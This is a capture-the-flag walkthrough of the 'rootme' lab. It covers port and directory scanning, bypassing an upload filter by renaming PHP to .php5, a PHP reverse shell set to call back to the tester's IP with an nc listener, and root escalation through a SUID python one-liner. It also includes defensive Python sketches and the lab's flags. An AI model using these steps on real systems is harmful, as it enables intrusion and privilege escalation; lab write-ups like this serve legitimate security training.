rootme

Task 1. Start the machine

Task 2. Reconnaissance

Question 1.

Scan the machine, how many ports are open? 

Scan the target

# nmap -A -p- 10.x.x.x

Found 2 open ports: 22 and 80.


Output

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))


Question 2.

What version of Apache is running?

From the nmap scan we can see that the Apache version is 2.4.29.

Question 3.

What service is running on port 22? 

From the scan output we can see that the service running on port 22 is SSH.

Answer 3. 

22

Question 4.  

Find directories on the web server using the GoBuster tool.

# gobuster -h 


Output

Usage:

  gobuster [command]

Available Commands:

  dir         Uses directory/file enumeration mode

  dns         Uses DNS subdomain enumeration mode

  fuzz        Uses fuzzing mode

  help        Help about any command

  s3          Uses aws bucket enumeration mode

  version     shows the current version

  vhost       Uses VHOST enumeration mode

Flags:

      --delay duration    Time each thread waits between requests (e.g. 1500ms)

  -h, --help              help for gobuster

      --no-error          Don't display errors

  -z, --no-progress       Don't display progress

  -o, --output string     Output file to write results to (defaults to stdout)

  -p, --pattern string    File containing replacement patterns

  -q, --quiet             Don't print the banner and other noise

  -t, --threads int       Number of concurrent threads (default 10)

  -v, --verbose           Verbose output (errors)

  -w, --wordlist string   Path to the wordlist

We will use the following switches.

-w : path to wordlist 

-u : url

dir : directory bruteforce


# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.47.229 2> /dev/null

The scan returned five entries.


Output

/uploads              (Status: 301) [Size: 314] [--> http://10.10.47.229/uploads/]

/css                  (Status: 301) [Size: 310] [--> http://10.10.47.229/css/]

/js                   (Status: 301) [Size: 309] [--> http://10.10.47.229/js/]

/panel                (Status: 301) [Size: 312] [--> http://10.10.47.229/panel/]

/server-status        (Status: 403) [Size: 277]


Note

Status code 301: The HTTP response status code 301 Moved Permanently is used for permanent redirection, meaning current links or records using the URL this response is received for should be updated. Here gobuster requested /uploads and Apache redirected to /uploads/, the trailing-slash form of the directory, which is why each directory shows up as a 301.

Status code 403: The HTTP 403 Forbidden client error status response code indicates that the server understood the request but refuses to authorize it.

This status is similar to 401, but in this case, re-authenticating will make no difference. The access is permanently forbidden and tied to the application logic, such as insufficient rights to a resource.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403

The 2> /dev/null at the end redirects standard error (file descriptor 2) to /dev/null, so any errors that occur during the scan are discarded instead of cluttering the output.

Question 5.  

What is the hidden directory? 

Answer 5.

/panel/

Task 3. Getting a Shell

Question 1. 

Find a form to upload and get a reverse shell, and find the flag. 

Hint 

Search for “file upload bypass” and “PHP reverse shell”. 

Before searching on Google for what the hint mentions, I tried using the php-reverse-shell from the Laudanum collection that comes with Kali Linux. It can be found in the following path:

/usr/share/laudanum/php/

We need to edit the php-reverse-shell.php file. 

# nano php-reverse-shell.php

Change the parameter $ip to your local machine's IP and $port to any port that you know will not be blocked on your local machine.

Save and exit the document. 


Output

set_time_limit (0);

$VERSION = "1.0";

$ip = '10.10.139.4';  // CHANGE THIS

$port = 1234;       // CHANGE THIS

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;


Upload the file

Unfortunately you are not allowed to upload .php files on the website, so we are back to Google. It turns out we can get the file past the upload check by renaming it from .php to .php5.

After renaming, we can successfully upload the file.
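Here is an added example, not code from the room or from this writeup, that shows from the defender's side why a rename like that gets through: a Python sketch of a deny-list extension check that only rejects a literal ".php" suffix, next to an allow-list check that also verifies the file's leading bytes. The allowed types, the magic-byte table and the sample inputs are all constructed for the example.

```python
import os
import re

# Allow-list of upload types for the hardened check (constructed for this example).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Leading bytes ("magic") a file of each allowed type must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}


def weak_upload_check(filename):
    """Deny-list check of the kind the upload form appears to use: it rejects
    only a literal '.php' suffix, so 'shell.php5', 'shell.phtml' or 'shell.PHP'
    all slip through."""
    return not filename.endswith(".php")


def strict_extension(filename):
    """Allow-list check. Returns the normalised extension when the name is a
    plain 'name.ext' with an allowed extension, otherwise None. Rejects path
    components, dotfiles and double extensions such as 'x.php.png'."""
    if os.path.basename(filename) != filename or filename.startswith("."):
        return None
    parts = filename.split(".")
    if len(parts) != 2:
        return None
    name, ext = parts
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name):
        return None
    ext = ext.lower()
    return ext if ext in ALLOWED_EXTENSIONS else None


def validate_upload(filename, data):
    """Combine the extension allow-list with a magic-byte check on the content,
    so script source cannot be stored under an image name. Returns (accepted, reason)."""
    ext = strict_extension(filename)
    if ext is None:
        return False, "extension not allowed"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples: a renamed script and a real-looking PNG header.
    samples = [
        ("shell.php5", b"<?php echo 1; ?>"),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ]
    for name, body in samples:
        print(name, "weak:", weak_upload_check(name), "strict:", validate_upload(name, body))
```

Even with the stricter check, the stored file should get a server-generated name and the /uploads directory should be served from a location where the web server does not execute scripts; the extension check alone is only the first layer.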

Getting the shell

Next we need to start netcat in order to get the reverse shell. We will use the following command and switches.

# nc -lvnp 1234 

-l  listen mode, for inbound connects

-n numeric-only IP addresses, no DNS

-v verbose 

-p local port number

Once we have nc set up, it's time to run the reverse shell script.

We have successfully uploaded the shell to the server, so in order to execute it we need to navigate to the folder containing the uploaded file.

Going back to Gobuster's output, we found a directory named /uploads. Navigate to that directory and, sure enough, the file is there. Click on the file and let's have a look at netcat.


Output

# nc -vnlp 1234

listening on [any] 1234 ...

connect to [10.9.4.125] from (UNKNOWN) [10.10.139.4] 46402

Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 13:14:58 up 27 min,  0 users,  load average: 0.07, 0.02, 0.06

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off


We are in; now all that's left is to locate the flag. The file containing it is called user.txt.

A simple find command gives us the location. 

$ find / -type f -name user.txt 2> /dev/null

/var/www/user.txt

$ cat /var/www/user.txt 

THM{y0u_g0t_a_sh3ll}

Note

Laudanum is a collection of injectable files, designed to be used in a pentest when upload vulnerabilities, administrative interfaces, and SQL injection flaws are found. These files are written in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.

Task 4. Privilege Escalation

Now that we have a shell, let's escalate our privileges to root.

Question 1.  

Search for files with SUID permission, which file is weird? 

Note

SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. 

If you create a script (owned by the root user) that needs the SUID bit set, you’d do so like: 

$ sudo chmod u+s filename

To search for the files with SUID permission we can use the following command.


# find / -type f -user root -perm -4000 2>/dev/null

-perm -4000 : search for files with the SUID bit (mode 4000) set

-type f : search for files only (not directories)

2>/dev/null : suppress errors

-user root : search for files owned by the specified user (root)


Output

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/snapd/snap-confine

/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

/usr/lib/eject/dmcrypt-get-device

/usr/lib/openssh/ssh-keysign

/usr/lib/policykit-1/polkit-agent-helper-1

/usr/bin/traceroute6.iputils

/usr/bin/newuidmap

/usr/bin/newgidmap

/usr/bin/chsh

/usr/bin/python


From the output we find an interesting file at /usr/bin/python: a SUID-root copy of an interpreter is not something a stock install ships, and anything it runs inherits root's effective privileges.
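As an added example (not part of the writeup or the room), a small Python audit that does the same job as the find command from the defender's side: it walks the filesystem for SUID files, or parses saved find output, and compares the result against a baseline so that an unexpected SUID binary shows up on its own. The baseline below is constructed from this writeup's own find output with /usr/bin/python left out, which is what makes the audit flag it; the prune list and the sample input are assumptions for the example.

```python
import os
import stat

# Baseline of SUID binaries expected on this host, constructed from the
# writeup's find output above, minus /usr/bin/python (a SUID interpreter is
# never part of a stock install and is the anomaly we want to catch).
EXPECTED_SUID = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/snapd/snap-confine",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/bin/traceroute6.iputils",
    "/usr/bin/newuidmap",
    "/usr/bin/newgidmap",
    "/usr/bin/chsh",
}

# Pseudo-filesystems that are not worth walking (assumed list).
PRUNE = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/", owner_uid=None):
    """Walk the tree from root and return the paths of regular files with the
    SUID bit set, optionally restricted to one owner. This mirrors
    `find root -type f -perm -4000` (and -user when owner_uid is given)."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            found.append(path)
    return sorted(found)


def parse_find_output(text):
    """Turn saved output of `find / -perm -4000` into a set of paths."""
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}


def audit(found, expected=EXPECTED_SUID):
    """Compare SUID files against the baseline. Returns (unexpected, missing):
    SUID files not in the baseline, and baseline entries that are no longer SUID."""
    found = set(found)
    return sorted(found - expected), sorted(expected - found)


if __name__ == "__main__":
    unexpected, missing = audit(find_suid("/", owner_uid=0))
    for path in unexpected:
        print("UNEXPECTED SUID:", path)
    for path in missing:
        print("baseline entry no longer SUID:", path)
```

Run periodically (or from a file-integrity job) and diffed against a baseline taken at build time, a check like this turns "which file is weird?" into an alert rather than a manual read through the list.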

Question 2.

Find a form to escalate your privileges.

Hint

Search for gtfobins
https://gtfobins.github.io/gtfobins/python/

Navigate to the SUID section, omit the first command. 

Question 3.

root.txt

$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

After that we are running as root, so now let's get the root.txt flag.

# find / -type f -name root.txt 2> /dev/null

# cat /root/root.txt


Output

THM{pr1v1l3g3_3sc4l4t10n}


Answer 3.

THM{pr1v1l3g3_3sc4l4t10n}